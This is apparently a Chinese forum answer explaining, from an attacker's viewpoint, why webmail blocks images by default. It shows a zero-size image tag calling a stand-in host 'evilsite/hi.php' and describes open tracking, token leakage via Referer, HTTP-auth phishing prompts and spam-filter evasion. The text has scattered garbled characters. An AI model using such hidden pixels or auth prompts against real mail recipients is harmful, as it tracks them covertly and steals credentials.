站在黑客角度來給出答案����。
大多數(shù)專業(yè)郵箱都默認不顯示圖片,因為:
http://evilsite/hi.php width=0 height=0 />
看�����,src的值可以不需要是真圖片���。
這樣可以隱蔽地得到郵件URL(即Referer����,即瀏覽器地址欄那個URL)�����。
有什么用呢����?
1. 郵件打開跟蹤:只要郵件被查看就會請求這個hi.php地址���,hi.php可以做好記錄�����,除了記錄是否被請求了����,還可記錄郵件URL、用戶瀏覽器User-Agent����、用戶IP地址等。這個可以做個郵件跟蹤系統(tǒng)了:)
有了這個�����,根本不需要「已讀回執(zhí)」功能了����。
有了這個,搞垃圾郵件群發(fā)的���,各位腦補下�����,他們會有多開心����。
2. 某些手機端郵箱:傳統(tǒng)的WAP或APP(本質(zhì)是Web的情況),Referer可能會包括用戶身份token���,這會導致身份token輕易泄露���,賬號被盜。
3. 有人用hi.php來玩釣魚攻擊:hi.php可以被設(shè)置需要Auth等認證���,這時一查看郵箱就彈出一個Auth窗口����,提醒輸入用戶名密碼���,只要場景設(shè)計好���,有一定概率���,用戶會被釣魚。
4. 確實�����,圖片可以很好躲避基于文本的貝葉斯反垃圾機制�����。默認屏蔽圖片���,「意外」屏蔽了這個眼不見心不煩的煩惱
就這么小的一個點,這些年來一直出現(xiàn)各種對抗�����,出現(xiàn)個對抗又被修復�����。什么是好郵箱�����?好郵箱就是這么小的一個點,必須把控好安全與體驗的那種平衡:)
目前Gmail采用的方式是用Google自己的服務(wù)器下載所有嵌入郵件的圖片�����,之后在用戶打開郵件時使用服務(wù)器上的那份���。很安全���,并且相對更User-friendly一些。
